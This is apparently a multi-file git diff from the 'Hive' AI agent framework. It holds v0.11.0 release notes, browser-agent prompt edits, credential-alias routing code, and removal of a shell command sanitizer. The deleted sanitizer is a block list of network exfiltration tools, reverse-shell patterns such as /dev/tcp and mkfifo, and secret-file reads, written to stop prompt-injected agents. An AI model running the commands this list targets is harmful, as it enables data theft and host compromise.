| worker | 4 | Real MCP tools (`example_tool`, `get_current_time`, `save_data`/`load_data`) |
| worker | 4 | Real MCP tools (`get_current_time`, `save_data`/`load_data`) |
Typical runtime is 1–3 minutes depending on provider latency.
+127
View File
@@ -0,0 +1,127 @@
# 🐝 Hive Agent v0.11.0: Action Plans, Charts, and a Cleaner Queen
> Major features released in Hive 0.11. Now Queen has an action plan for everything and charting capability to do analytics for you. Overall the conversation and agent experience is also improved a lot thanks to a major Queen prompt and tools refactor.
---
## ✨ Highlights
### 📋 Queen now keeps an action plan for everything
A new file-backed task system gives Queen a persistent, structured plan for every conversation — visible to the user, editable on the fly, and surviving session reload.
- **File-backed task store** under `core/framework/tasks/` with full CRUD, scoping, hooks, and reminders. Tasks live on disk so they outlast a single agent run and can be inspected, replayed, or shared between Queen and colony workers.
- **Multi-task creation in one call** — Queen can stage a whole plan up front instead of dripping out one task at a time, then tick items off as it works.
- **Colony task templates** — colonies can publish a template task list that Queen picks up when the colony is invoked, so recurring workflows start with the same plan every time.
- **Live task list in the UI** — a new `TaskListPanel` renders the plan in real time next to the chat, with item status flowing through the event bus as Queen marks tasks done.
- **Task reminders + hooks** wire into Queen's loop so the plan stays in front of the model and structural blockers preventing tool calls on `task_*` are now resolved.
### 📊 Charting capability for analytics
Queen can now produce real charts inline in the conversation, not just describe them.
- **New `chart_tools` MCP server** with ECharts and Mermaid renderers, an OpenHive theme, and a `chart-creation-foundations` skill that teaches Queen when to chart vs. when to table.
- **Inline chart rendering in chat** — `EChartsBlock` and `MermaidBlock` components render the chart spec directly in the transcript; tool results get a contentful display with `ChartToolDetail` instead of a JSON dump.
- **Chart spec normalization** in the renderer keeps Y-axis scaling, series colors, and theme tokens consistent regardless of how Queen phrases the spec.
### 🧹 Major Queen prompt + tools refactor
The biggest cleanup of Queen's tool surface and prompt since v0.7. Fewer, sharper tools; a shorter, more focused prompt; and a clearer model of what Queen has access to vs. what colonies do.
- **File ops consolidated** — `apply_diff`, `apply_patch`, `hashline_edit`, the old `data_tools`, `grep_search`, and the legacy `coder_tools_server` are gone. A single rewritten `file_ops` module covers read / search / list / edit with a more predictable interface and ~1.7k fewer lines on net.
- **Search and list-files unified** into one toolkit so Queen stops juggling near-duplicate variants.
- **Browser tools audit** — interactions, navigation, tabs, and lifecycle trimmed and consolidated; `web_scrape` and `browser_open` merged into a single web-search-and-open path.
- **New shell/terminal toolkit** (`shell_tools`) — replaces the old `execute_command_tool` and the inline command sanitizer with a typed module that has proper job control, PTY sessions, ring-buffered output, semantic exit codes, and a destructive-command warning gate. Five new preset skills (`shell-tools-foundations`, `-fs-search`, `-job-control`, `-pty-sessions`, `-troubleshooting`) teach Queen the new surface.
- **Old lifecycle tools removed** — `queen_lifecycle_tools.py` shrunk by ~900 lines as deprecated default tools came out.
- **Prompt simplification + improvements** — Queen's node prompts dropped redundant `_queen_style` blocks, tightened phrasing, and now lean on the task system for plan-keeping instead of restating the plan every turn.
- **Tools editor frontend grouping** — `ToolsEditor.tsx` groups tools by category so configuring a queen profile is no longer a flat scroll through 80+ entries.
---
## 🆕 What's New
### Tasks & Action Plans
- **`core/framework/tasks/`** — full task subsystem: `store`, `models`, `events`, `hooks`, `reminders`, `scoping`, plus a `tools/` package exposing session and colony task tools to Queen. (@RichardTang-Aden)
- **`POST /api/tasks` routes** for the frontend to read and mutate the live plan. (@RichardTang-Aden)
- **`TaskListPanel` + `TaskItem` + `TaskListContext`** on the frontend render the plan in real time. (@RichardTang-Aden)
- **Multi-task creation tool** lets Queen stage a whole plan in one call. (@RichardTang-Aden)
- **Colony task templates** — colonies ship with a default task list that Queen adopts on entry. (@RichardTang-Aden)
- **Hook + reminder fixes** so Queen reliably uses `task_*` tools instead of skipping them. (@RichardTang-Aden)
### Charts
- **`tools/src/chart_tools/`** — new MCP server with `renderer.py`, `theme.py`, `tools.py`, plus bundled `echarts.min.js` and `mermaid.min.js`. (@TimothyZhang7)
- **`chart-creation-foundations` skill** teaches Queen when and how to chart. (@TimothyZhang7)
- **`EChartsBlock` / `MermaidBlock` / `ChartToolDetail`** components render charts inline. (@TimothyZhang7)
- **OpenHive chart theme** (`openhiveTheme.ts`) keeps chart styling consistent with the rest of the UI. (@TimothyZhang7)
- **Chart spec normalization** in the renderer fixes Y-axis edge cases and series defaults. (@TimothyZhang7)
### Queen Prompt & Tools Refactor
- **Major file ops refactor** — single rewritten `file_ops` module replaces `apply_diff`, `apply_patch`, `hashline_edit`, `grep_search`, `data_tools`, and the legacy `coder_tools_server`. (@RichardTang-Aden)
- **Edit-file refactor** with a tighter API surface and ~560 lines of dead `test_file_ops_hashline.py` removed. (@RichardTang-Aden)
- **Search + list-files consolidation** into one toolkit. (@RichardTang-Aden)
- **Browser tools audit** — navigation, interactions, lifecycle, and tabs trimmed; `web_scrape` and browser-open merged. (@RichardTang-Aden)
- **`shell_tools` package** replaces `execute_command_tool` with proper job control, PTY sessions, ring-buffered output, semantic exit codes, and destructive-command warnings. (@TimothyZhang7)
- **Five new shell preset skills** plus reference docs (`exit_codes.md`, `find_predicates.md`, `ripgrep_cheatsheet.md`, `signals.md`). (@TimothyZhang7)
- **Old lifecycle tools removed** — `queen_lifecycle_tools.py` lost ~900 lines. (@RichardTang-Aden)
- **Autocompaction + concurrency tools updated** to play nicely with the new tool registry. (@RichardTang-Aden)
- **Prompt simplification** — `nodes/__init__.py` dropped redundant `_queen_style` block and tightened phrasing across nodes. (@RichardTang-Aden)
- **`ToolsEditor` grouping** — frontend tool-config screen now groups tools by category. (@RichardTang-Aden)
### Conversation & Agent Experience
- **`ask_user` questions surface in the chat transcript** instead of vanishing into a side panel, and the question bubble now defers until the user actually answers. (@bryan)
- **New-session navigation with Queen warm-up UI** — new `queen-routing.tsx` page handles the warm-up so the user sees progress instead of a blank screen. (@bryan)
- **Sync tool result contentful display** — tool results render as structured cards (charts, file diffs, etc.) instead of raw JSON. (@TimothyZhang7)
### Vision Fallback
- **Vision model retry + fallback** — non-vision models can now route image inputs through a captioning step instead of failing. (@RichardTang-Aden)
- **Vision fallback with intent** — caption prompts incorporate the user's intent so the caption is task-relevant. (@RichardTang-Aden)
- **Vision fallback auth** — fallback path now uses the right credentials per provider. (@RichardTang-Aden)
- **Looser max-token cap** on vision fallback for models that spend output tokens on internal thinking. (@RichardTang-Aden)
- **Vision fallback model usage logging** for cost visibility. (@RichardTang-Aden)
### Colonies
- **`POST /api/colonies/import`** — onboard a colony from a `tar` / `tar.gz` upload. 50 MB cap, manual path-traversal validation (Python 3.11 compatible), symlinks/hardlinks/devices rejected, mode bits masked. Tests cover happy path, name override, replace flag, traversal, absolute paths, and corrupt archives. (@RichardTang-Aden)
- **Refactored colony routes** — `routes_colonies.py` gained ~450 lines of structure for import/export/list flows. (@TimothyZhang7)
### MCP & Tools
- **SimilarWeb V5 integration** — 29 new MCP tools covering traffic & engagement, competitor intelligence, keywords/SERP, audience demographics, and segment analysis. Includes credential spec, health checker, README, and tests on Ubuntu and Windows. (#7066)
- **MCP registry initialization fix** — registry no longer races on first install. (@RichardTang-Aden)
---
## 🐛 Bug Fixes
- **Initial install** path resolution — hardcoded `HIVE_HOME` references replaced; all agent paths now prefixed by the resolved `HIVE_HOME`. (@RichardTang-Aden)
- **Frontend recovery** after a broken state on session reload. (@RichardTang-Aden)
- **Compaction issues** when the agent loop runs into the buffer mid-stream. (@RichardTang-Aden)
- **LiteLLM patch** for a streaming-usage edge case. (@RichardTang-Aden)
- **`ask_user` question bubble** now defers until the user answers. (@bryan)
- **Incubating-mode approval guidance** correctly injects into the prompt. (@RichardTang-Aden)
- **LLM debugger** — fixed timeline order and tool-call display. (@RichardTang-Aden)
- **Shell split-command** parsing fix. (@TimothyZhang7)
- **Chart Y-axis** + **chart spec normalization** edge cases. (@TimothyZhang7)
- **Scroll behavior** on certain element selectors. (@bryan)
- **CI fixes**: skills `HIVE_HOME` refactor regressions, `run_parallel_workers` losing task text on spawn, `test_capabilities` deprecated model identifiers, `test_colony_runtime_overseer` Windows flake. (#7141, #7149)
- **Orphan Zoho CRM test directory** removed under `src/` after the MCP refactor. (#7142)
- **Credentials** — `EnvVarStorage.exists` now matches `load` semantics for empty values. (#5680)
---
## 🚀 Upgrading from v0.10.5
No migration required. Pull `main` at `v0.11.0` and restart Hive — existing `~/.hive/` profiles, queens, colonies, and sessions keep working.
A few things to know:
1. **Queen's default tool surface changed.** If you have a queen profile pinned to a removed tool (e.g. `apply_diff`, `apply_patch`, `hashline_edit`, `grep_search`, the old `execute_command_tool`), it'll fall back to the consolidated replacements. Custom profiles referencing those tool names should be updated.
2. **Old `queen_lifecycle_tools` entries are gone.** If you wired any external code against those defaults, switch to the new task system.
3. **Task plan is now persistent.** Queen will start staging a plan automatically on new sessions — if you don't want the panel, you can collapse it from the layout.
Plan the work. Chart the result. 🐝
+1 -1
View File
@@ -334,7 +334,7 @@ Update incrementally — do not rewrite from scratch each time.
**Background:** Replaces the older in-memory `_batch_ledger` (and `_working_notes → Current Plan` decomposition) — both were removed on 2026-04-15 because they duplicated state that belongs in SQLite. The queue, per-task `steps` decomposition, and `sop_checklist` hard-gates now all live in `progress.db` and are authoritative.
**Protocol (injected into system prompt):** Workers receive `db_path` and `colony_id` (and optionally `task_id`) in their spawn message and interact with the ledger via `sqlite3` through `execute_command_tool`. The full claim → load plan → execute step → SOP-gate → mark done loop is documented in the skill's `SKILL.md`.
**Protocol (injected into system prompt):** Workers receive `db_path` and `colony_id` (and optionally `task_id`) in their spawn message and interact with the ledger via `sqlite3` through `terminal_exec`. The full claim → load plan → execute step → SOP-gate → mark done loop is documented in the skill's `SKILL.md`.
**Tables:**
- `tasks` — queue: pending → claimed → done|failed, with `worker_id` and atomic claim tokens
@@ -17,16 +17,15 @@ map_search_gcu = NodeSpec(
You are a browser agent. Your job: Search Google Maps for the provided query and extract business names and website URLs.
## Workflow
1. browser_start
2. browser_open(url="https://www.google.com/maps")
3. use the url query to search for the keyword
3.1 alternatively, use browser_type or browser_click to search for the "query" in memory.'
4. browser_wait(seconds=3)
5. browser_snapshot to find the list of results.
6. For each relevant result, extract:
1. browser_open(url="https://www.google.com/maps") # lazy-creates the context
2. use the url query to search for the keyword
2.1 alternatively, use browser_type or browser_click to search for the "query" in memory.'
3. browser_wait(seconds=3)
4. browser_snapshot to find the list of results.
5. For each relevant result, extract:
- Name of the business
- Website URL (look for the website icon/link)
7. set_output("business_list", [{"name": "...", "website": "..."}, ...])
6. set_output("business_list", [{"name": "...", "website": "..."}, ...])
## Constraints
- Extract at least 5-10 businesses if possible.
@@ -24,13 +24,12 @@ Focus on:
- Hardware/Silicon breakthroughs
## Instructions
1. browser_start
2. For each handle:
a. browser_open(url=f"https://x.com/{handle}")
1. For each handle:
a. browser_open(url=f"https://x.com/{handle}") # lazy-creates the context on first call
b. browser_wait(seconds=5)
c. browser_snapshot
d. Parse relevant tech news text
3. set_output("raw_tweets", consolidated_json)
2. set_output("raw_tweets", consolidated_json)
""",
)
+6 -4
View File
@@ -244,12 +244,14 @@ def main() -> None:
logger.error("Failed to connect to GCU server: %s", e)
sys.exit(1)
# Auto-start browser context so tools work immediately
# Warm the browser context so the first interactive call doesn't pay the
# cold-start round trip. about:blank lazy-creates the context just like
# a real URL would, without committing to a destination page.
try:
result = client.call_tool("browser_start", {})
logger.info("browser_start: %s", result)
result = client.call_tool("browser_open", {"url": "about:blank"})
logger.info("browser_open(about:blank): %s", result)
except Exception as e:
logger.warning("browser_start failed (may already be started): %s", e)
logger.warning("browser warm-up failed (may already be running): %s", e)
app = create_app()
+1 -1
View File
@@ -457,7 +457,7 @@ let currentView = 'grid';
// Tool categories for sidebar grouping
const CATEGORIES = {
'Lifecycle': ['browser_setup', 'browser_start', 'browser_stop', 'browser_status'],
'Lifecycle': ['browser_setup', 'browser_stop', 'browser_status'],
'Tabs': ['browser_tabs', 'browser_open', 'browser_close', 'browser_close_all', 'browser_close_finished', 'browser_activate_tab'],
'Navigation': ['browser_navigate', 'browser_go_back', 'browser_go_forward', 'browser_reload'],
'Interactions': ['browser_click', 'browser_click_coordinate', 'browser_type', 'browser_type_focused', 'browser_press', 'browser_press_at', 'browser_hover', 'browser_hover_coordinate', 'browser_select', 'browser_scroll', 'browser_drag'],
+2 -8
View File
@@ -72,10 +72,7 @@ verbatim; system + credential paths are on a deny list).
| `read_file` | Read file contents (with optional hashline anchors) |
| `write_file` | Create or overwrite a file |
| `edit_file` | Find/replace with fuzzy fallback |
| `hashline_edit` | Anchor-based structural edits validated by line hashes |
| `apply_patch` | Apply a diff_match_patch text |
| `search_files` | Grep file contents (`target='content'`) or list/find files (`target='files'`) — replaces grep, find, and ls |
| `execute_command_tool` | Execute shell commands |
| `save_data` / `load_data` | Persist and retrieve structured data across steps |
| `serve_file_to_user` | Serve a file for the user to download |
| `list_data_files` | List persisted data files in the session |
@@ -176,11 +173,8 @@ tools/
│ ├── file_ops.py # ALL file tools (read, write, edit, hashline_edit, search_files, apply_patch)
│ ├── credentials/ # Credential management
│ └── tools/ # Tool implementations
│ ├── example_tool/
├── file_system_toolkits/ # Shell only — file tools moved to file_ops.py
│ │ ├── security.py
│ │ ├── command_sanitizer.py
│ │ └── execute_command_tool/
│ ├── file_system_toolkits/ # Sandbox path helpers (security.py)
│ └── security.py
│ ├── web_search_tool/
│ ├── web_scrape_tool/
│ ├── pdf_read_tool/
+1 -1
View File
@@ -61,7 +61,7 @@ All replies carry `{ id, result }` or `{ id, error }`.
# 1. At GCU server startup, open ws://localhost:9229/beeline and wait for
# the extension to connect (sends { type: "hello" }).
#
# 2. On browser_start(profile):
# 2. On the first browser tool call for a profile (lazy-start via _ensure_context):
# - Send { id, type: "context.create", agentId: profile }
# - Receive { groupId, tabId }
# - Store groupId in the session object (no Chrome process, no CDP port)
+2 -1
View File
@@ -35,7 +35,8 @@ GITHUB_CREDENTIALS = {
help_url="https://github.com/settings/tokens",
description="GitHub Personal Access Token (classic)",
# Auth method support
aden_supported=False,
aden_supported=True,
aden_provider_name="github",
direct_api_key_supported=True,
api_key_instructions="""To get a GitHub Personal Access Token:
1. Go to GitHub Settings > Developer settings > Personal access tokens
@@ -29,6 +29,8 @@ NOTION_CREDENTIALS = {
startup_required=False,
help_url="https://www.notion.so/my-integrations",
description="Notion internal integration token",
aden_supported=True,
aden_provider_name="notion",
direct_api_key_supported=True,
api_key_instructions="""To set up Notion API access:
1. Go to https://www.notion.so/my-integrations
+1 -1
View File
@@ -67,7 +67,7 @@ SLACK_CREDENTIALS = {
help_url="https://api.slack.com/apps",
description="Slack Bot Token (starts with xoxb-)",
# Auth method support
aden_supported=False,
aden_supported=True,
aden_provider_name="slack",
direct_api_key_supported=True,
api_key_instructions="""To get a Slack Bot Token:
@@ -26,6 +26,8 @@ Usage:
from __future__ import annotations
from contextlib import contextmanager
from contextvars import ContextVar
from typing import TYPE_CHECKING, Any
from .base import CredentialError, CredentialSpec
@@ -34,6 +36,36 @@ if TYPE_CHECKING:
from framework.credentials import CredentialStore
# Worker profiles inject their per-provider account aliases into this
# ContextVar before each tool turn. When a tool calls
# ``credentials.get_by_alias(provider, "")`` (or ``credentials.get(name)``),
# the adapter consults the map and, if the provider has a binding, uses
# that alias for the lookup. An explicit non-empty alias on the call wins.
# Keys are credential ids (matching ``CredentialSpec.credential_id``);
# values are the account alias to route to.
_active_account_overrides: ContextVar[dict[str, str] | None] = ContextVar(
"hive_credential_account_overrides", default=None
)
@contextmanager
def account_overrides(overrides: dict[str, str] | None):
"""Bind ``overrides`` for the duration of the ``with`` block.
Used by the colony runtime to pin a worker's MCP tool calls to its
profile's aliases. Empty / ``None`` is a no-op so callers can safely
pass through unbound profiles without conditional logic.
"""
if not overrides:
yield
return
token = _active_account_overrides.set(dict(overrides))
try:
yield
finally:
_active_account_overrides.reset(token)
# Process-wide memoization for CredentialStoreAdapter.default().
#
# Without this, every caller (e.g. each MCP server registration in
@@ -127,6 +159,19 @@ class CredentialStoreAdapter:
if name not in self._specs:
raise KeyError(f"Unknown credential '{name}'. Available: {list(self._specs.keys())}")
if account is None:
# No explicit caller-supplied alias — check whether the active
# worker profile has pinned this credential to a specific
# account. Falls through to the unaliased default lookup when
# no profile binding exists.
overrides = _active_account_overrides.get()
if overrides:
bound_alias = overrides.get(name)
if bound_alias:
aliased = self.get_by_alias(name, bound_alias)
if aliased is not None:
return aliased
if account is not None:
try:
from framework.credentials.local.registry import LocalCredentialRegistry
@@ -364,10 +409,23 @@ class CredentialStoreAdapter:
def get_by_alias(self, provider_name: str, alias: str) -> str | None:
"""Resolve a specific account's token by alias.
When ``alias`` is empty, falls back to the active worker profile's
binding (if any). MCP tools default ``account=""`` so this lets a
worker profile pin a default account without requiring the agent
to supply it on every call.
Raises:
CredentialExpiredError: If the matched credential is expired and
refresh failed.
"""
if not alias:
overrides = _active_account_overrides.get()
if overrides:
bound_alias = overrides.get(provider_name)
if bound_alias:
alias = bound_alias
if not alias:
return None
cred = self._store.get_credential_by_alias(provider_name, alias)
if cred is None:
return None
@@ -584,7 +642,7 @@ class CredentialStoreAdapter:
# Use 5-second timeout to avoid blocking on slow/failed requests
client = AdenCredentialClient(
AdenClientConfig(
base_url=os.environ.get("ADEN_API_URL", "https://api.adenhq.com"),
base_url=os.environ.get("ADEN_API_URL", "https://app.open-hive.com"),
timeout=5.0,
)
)
+12 -42
View File
@@ -22,13 +22,11 @@ Usage:
from __future__ import annotations
import contextlib
import difflib
import fnmatch
import os
import re
import subprocess
import sys
import threading as _threading
from collections.abc import Callable
from dataclasses import dataclass, field
@@ -924,8 +922,7 @@ def _apply_hunk(content: str, hunk: _Hunk) -> tuple[str, str | None]:
count = content.count(hunk.context_hint)
if count > 1:
return content, (
f"addition-only hunk: context hint "
f"'{hunk.context_hint}' is ambiguous ({count} occurrences)"
f"addition-only hunk: context hint '{hunk.context_hint}' is ambiguous ({count} occurrences)"
)
if count == 1:
idx = content.find(hunk.context_hint)
@@ -1045,9 +1042,7 @@ def _apply_v4a(
for hunk_idx, hunk in enumerate(op.hunks):
new_content, herr = _apply_hunk(content, hunk)
if herr:
errors.append(
f"Op #{op_idx + 1} update {op.path} hunk #{hunk_idx + 1}: {herr}"
)
errors.append(f"Op #{op_idx + 1} update {op.path} hunk #{hunk_idx + 1}: {herr}")
break
content = new_content
fs_state[resolved] = content
@@ -1063,9 +1058,7 @@ def _apply_v4a(
errors.append(f"Op #{op_idx + 1} move {op.path}: {err}")
continue
if os.path.exists(dst_resolved) and fs_exists.get(dst_resolved, True):
errors.append(
f"Op #{op_idx + 1} move {op.path}: destination already exists"
)
errors.append(f"Op #{op_idx + 1} move {op.path}: destination already exists")
continue
fs_state[dst_resolved] = fs_state[resolved]
fs_exists[dst_resolved] = True
@@ -1121,8 +1114,7 @@ def _apply_v4a(
if apply_errors:
return None, (
"Apply phase failed (state may be inconsistent — run `git diff` to assess):\n "
+ "\n ".join(apply_errors)
"Apply phase failed (state may be inconsistent — run `git diff` to assess):\n " + "\n ".join(apply_errors)
)
summary_parts: list[str] = []
@@ -1177,10 +1169,7 @@ def _patch_replace(
f"harness can track its state before you edit it."
)
if _fresh.status is Freshness.STALE:
return (
f"Refusing to edit '{path}': {_fresh.detail}. Re-read the file with "
f"read_file before editing."
)
return f"Refusing to edit '{path}': {_fresh.detail}. Re-read the file with read_file before editing."
try:
with open(resolved, encoding="utf-8") as f:
@@ -1217,9 +1206,7 @@ def _patch_replace(
break
if matched is None:
close = difflib.get_close_matches(
old_string[:200], content.split("\n"), n=3, cutoff=0.4
)
close = difflib.get_close_matches(old_string[:200], content.split("\n"), n=3, cutoff=0.4)
msg = (
f"Error: Could not find a unique match for old_string in {path}. "
f"Use read_file to verify the current content, or search_files "
@@ -1352,14 +1339,8 @@ EDIT_FILE_PARAMS = {
"tabs vs spaces, smart quotes vs ASCII, and literal \\n/\\t/\\r "
"vs real control chars."
),
"new_string": (
"Replace mode only. Replacement text. Pass an empty string to "
"delete the matched text."
),
"replace_all": (
"Replace mode only. Replace every occurrence instead of requiring "
"a unique match. Default False."
),
"new_string": ("Replace mode only. Replacement text. Pass an empty string to delete the matched text."),
"replace_all": ("Replace mode only. Replace every occurrence instead of requiring a unique match. Default False."),
"patch_text": (
"Patch mode only. Structured patch body. File paths are embedded "
"inside the body via '*** Update File: <path>' / "
@@ -1396,18 +1377,14 @@ SEARCH_FILES_DOC = (
)
SEARCH_FILES_PARAMS = {
"pattern": (
"Regex (content mode) or glob (files mode, e.g. '*.py'). For an "
"'ls'-style listing pass '*' or '*.<ext>'."
"Regex (content mode) or glob (files mode, e.g. '*.py'). For an 'ls'-style listing pass '*' or '*.<ext>'."
),
"target": (
"'content' to grep inside files, 'files' to list/find files. "
"Legacy aliases: 'grep' -> 'content', 'find'/'ls' -> 'files'. "
"Default 'content'."
),
"path": (
"Directory (or, in content mode, a single file) to search. "
"Default '.'."
),
"path": ("Directory (or, in content mode, a single file) to search. Default '.'."),
"file_glob": (
"Restrict content search to filenames matching this glob. "
"Ignored in files mode (use the 'pattern' argument instead)."
@@ -1419,14 +1396,8 @@ SEARCH_FILES_PARAMS = {
"default), 'files_only' (paths only), 'count' (per-file match "
"counts)."
),
"context": (
"Lines of context before and after each match (content mode "
"only). Default 0."
),
"hashline": (
"Content mode: include N:hhhh hash anchors in matched lines. "
"Default False."
),
"context": ("Lines of context before and after each match (content mode only). Default 0."),
"hashline": ("Content mode: include N:hhhh hash anchors in matched lines. Default False."),
"task_id": (
"Optional anti-loop scope key. Defaults to a shared bucket; pass "
"a per-task id when multiple agents share a process."
@@ -1719,4 +1690,3 @@ def register_file_tools(
"Results have not changed — use what you have instead of re-searching.]"
)
return result
-6
View File
@@ -59,11 +59,7 @@ from .docker_hub_tool import register_tools as register_docker_hub
from .duckduckgo_tool import register_tools as register_duckduckgo
from .email_tool import register_tools as register_email
from .exa_search_tool import register_tools as register_exa_search
from .example_tool import register_tools as register_example
from .excel_tool import register_tools as register_excel
from .file_system_toolkits.execute_command_tool import (
register_tools as register_execute_command,
)
from .freshdesk_tool import register_tools as register_freshdesk
from .github_tool import register_tools as register_github
from .gitlab_tool import register_tools as register_gitlab
@@ -157,7 +153,6 @@ def _register_verified(
"""Register verified (stable) tools."""
_verified_before = set(mcp._tool_manager._tools.keys())
# --- No credentials ---
register_example(mcp)
if register_web_scrape:
register_web_scrape(mcp)
register_pdf_read(mcp)
@@ -199,7 +194,6 @@ def _register_verified(
# defaults to CWD here; framework callers that own a session-specific
# workspace should call register_file_tools directly with home set.
register_file_tools(mcp)
register_execute_command(mcp)
register_csv(mcp)
register_excel(mcp)
@@ -1,26 +0,0 @@
# Example Tool
A template tool demonstrating the Aden tools pattern.
## Description
This tool processes text messages with optional transformations. It serves as a reference implementation for creating new tools using the FastMCP decorator pattern.
## Arguments
| Argument | Type | Required | Default | Description |
|----------|------|----------|---------|-------------|
| `message` | str | Yes | - | The message to process (1-1000 chars) |
| `uppercase` | bool | No | `False` | Convert message to uppercase |
| `repeat` | int | No | `1` | Number of times to repeat (1-10) |
## Environment Variables
This tool does not require any environment variables.
## Error Handling
Returns error strings for validation issues:
- `Error: message must be 1-1000 characters` - Empty or too long message
- `Error: repeat must be 1-10` - Repeat value out of range
- `Error processing message: <error>` - Unexpected error
@@ -1,5 +0,0 @@
"""Example Tool package."""

from .example_tool import register_tools

# Public API: only the FastMCP registration hook is exported.
__all__ = ["register_tools"]
@@ -1,52 +0,0 @@
"""
Example Tool - A simple text processing tool for FastMCP.
Demonstrates native FastMCP tool registration pattern.
"""
from __future__ import annotations
from fastmcp import FastMCP
def register_tools(mcp: FastMCP) -> None:
    """Register the example tools on the given MCP server.

    Args:
        mcp: FastMCP server instance whose ``tool()`` decorator is used
            to expose each tool.
    """

    @mcp.tool()
    def example_tool(
        message: str,
        uppercase: bool = False,
        repeat: int = 1,
    ) -> str:
        """
        Process a text message with optional transformations.

        Reference implementation of the tool pattern: validate inputs,
        return error strings (never raise) so the agent sees a readable
        failure.

        Args:
            message: The message to process (1-1000 chars)
            uppercase: If True, convert the message to uppercase
            repeat: Number of times to repeat the message (1-10)

        Returns:
            The processed message string, or an "Error: ..." string on
            invalid input.
        """
        try:
            # Guard clauses: reject out-of-range inputs with the exact
            # error strings callers/tests expect.
            if not message or len(message) > 1000:
                return "Error: message must be 1-1000 characters"
            if not 1 <= repeat <= 10:
                return "Error: repeat must be 1-10"

            transformed = message.upper() if uppercase else message
            # Joining a single-element list is the identity, so one join
            # covers both the repeat==1 and repeat>1 cases.
            return " ".join([transformed] * repeat)
        except Exception as e:
            # Tool contract: surface unexpected failures as a string.
            return f"Error processing message: {str(e)}"
@@ -1,16 +1,15 @@
# File System Toolkits (post-consolidation)
This package now contains only the shell tool. **All file tools live in
`aden_tools.file_ops`** (read_file, write_file, edit_file, hashline_edit,
search_files, apply_patch) — they share one path policy and one home dir.
This package contains only sandbox path helpers used by `csv_tool` and
`excel_tool`. **All file tools live in `aden_tools.file_ops`** (read_file,
write_file, edit_file, hashline_edit, search_files, apply_patch) — they
share one path policy and one home dir.
## Sub-modules
| Module | Description |
|--------|-------------|
| `execute_command_tool/` | Shell command execution with sanitization (run_command, bash_kill, bash_output) |
| `command_sanitizer.py` | Validates and sanitizes shell command strings |
| `security.py` | Sandbox path resolver still used by execute_command_tool |
| `security.py` | Sandbox path resolver used by csv_tool and excel_tool |
## File tools
@@ -31,11 +30,3 @@ from aden_tools.file_ops import register_file_tools
register_file_tools(mcp, home="/path/to/agent/home")
```
For shell:
```python
from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools as register_shell
register_shell(mcp)
```
@@ -1,202 +0,0 @@
"""Command sanitization to prevent shell injection attacks.
Validates commands against a blocklist of dangerous patterns before they
are passed to subprocess.run(shell=True). This prevents prompt injection
attacks from tricking AI agents into running destructive or exfiltration
commands on the host system.
Design: uses a blocklist (not allowlist) so agents can run arbitrary
dev commands (uv, pytest, git, etc.) while blocking known-dangerous ops.
This blocks explicit nested shell executables (bash, sh, pwsh, etc.),
but callers still execute via shell=True, so shell parsing remains a
known limitation of this guardrail.
"""
import re
__all__ = ["CommandBlockedError", "validate_command"]
class CommandBlockedError(Exception):
    """Raised when the safety filter rejects a command string."""
# ---------------------------------------------------------------------------
# Blocklists
# ---------------------------------------------------------------------------

# Executables / prefixes that are never safe for an AI agent to invoke.
# Matched against each segment of a compound command (split on ; | && ||).
# Entries are compared against _normalize_executable_name() output: lowercase,
# basename only, ".exe" suffix stripped.
_BLOCKED_EXECUTABLES: list[str] = [
    # Network exfiltration
    "wget",
    "nc",
    "ncat",
    "netcat",
    "nmap",
    "ssh",
    "scp",
    "sftp",
    "ftp",
    "telnet",
    "rsync",
    # Windows network tools
    "invoke-webrequest",
    "invoke-restmethod",
    "iwr",
    "irm",
    "certutil",
    # User / privilege escalation
    "useradd",
    "userdel",
    "usermod",
    "adduser",
    "deluser",
    "passwd",
    "chpasswd",
    "visudo",
    "net",  # net user, net localgroup, etc.
    # System destructive
    "shutdown",
    "reboot",
    "halt",
    "poweroff",
    "init",
    "systemctl",
    "mkfs",
    "fdisk",
    "diskpart",
    "format",  # Windows format
    # Reverse shell / code exec wrappers
    "bash",
    "sh",
    "zsh",
    "dash",
    "csh",
    "ksh",
    "powershell",
    "pwsh",
    "cmd",
    # NOTE(review): _normalize_executable_name strips ".exe", so this entry
    # can never match and is redundant with "cmd" above — harmless.
    "cmd.exe",
    "wscript",
    "cscript",
    "mshta",
    "regsvr32",
    # Credential / secret access
    "security",  # macOS keychain: security find-generic-password
]
# Patterns matched against the full (joined) command string.
# These catch dangerous flags and argument combos even when the
# executable itself isn't blocked (e.g. python -c '...').
_BLOCKED_PATTERNS: list[re.Pattern[str]] = [
    # rm with force/recursive flags targeting root or broad paths
    re.compile(r"\brm\s+(-[rRf]+\s+)*(/|~|\.\.|C:\\)", re.IGNORECASE),
    # del /s /q (Windows recursive delete)
    re.compile(r"\bdel\s+.*/[sS]", re.IGNORECASE),
    re.compile(r"\brmdir\s+/[sS]", re.IGNORECASE),
    # dd writing to disks/partitions
    re.compile(r"\bdd\s+.*\bof=\s*/dev/", re.IGNORECASE),
    # chmod 777 / chmod -R 777
    re.compile(r"\bchmod\s+(-R\s+)?(777|666)\b", re.IGNORECASE),
    # sudo — agents should never escalate privileges
    re.compile(r"\bsudo\b", re.IGNORECASE),
    # su — switch user
    # NOTE(review): \bsu\s+ matches the standalone word "su" anywhere in
    # the command, so an argument literally named "su" is a false positive.
    re.compile(r"\bsu\s+", re.IGNORECASE),
    # ruby/perl with -e flag (inline code execution)
    re.compile(r"\bruby\s+-e\b", re.IGNORECASE),
    re.compile(r"\bperl\s+-e\b", re.IGNORECASE),
    # powershell encoded commands
    re.compile(r"\bpowershell\b.*-enc", re.IGNORECASE),
    # Reverse shell patterns
    re.compile(r"/dev/tcp/", re.IGNORECASE),
    re.compile(r"\bmkfifo\b", re.IGNORECASE),
    # eval / exec as standalone commands
    re.compile(r"^\s*eval\s+", re.IGNORECASE | re.MULTILINE),
    re.compile(r"^\s*exec\s+", re.IGNORECASE | re.MULTILINE),
    # Reading well-known secret files
    re.compile(r"\bcat\s+.*(\.ssh|/etc/shadow|/etc/passwd|credential_key)", re.IGNORECASE),
    re.compile(r"\btype\s+.*credential_key", re.IGNORECASE),
    # Backtick or $() command substitution containing blocked executables
    re.compile(r"\$\(.*\b(wget|nc|ncat)\b.*\)", re.IGNORECASE),
    re.compile(r"`.*\b(wget|nc|ncat)\b.*`", re.IGNORECASE),
    # Environment variable exfiltration via echo/print
    re.compile(r"\becho\s+.*\$\{?.*(API_KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL)", re.IGNORECASE),
    # >& /dev/tcp (bash reverse shell)
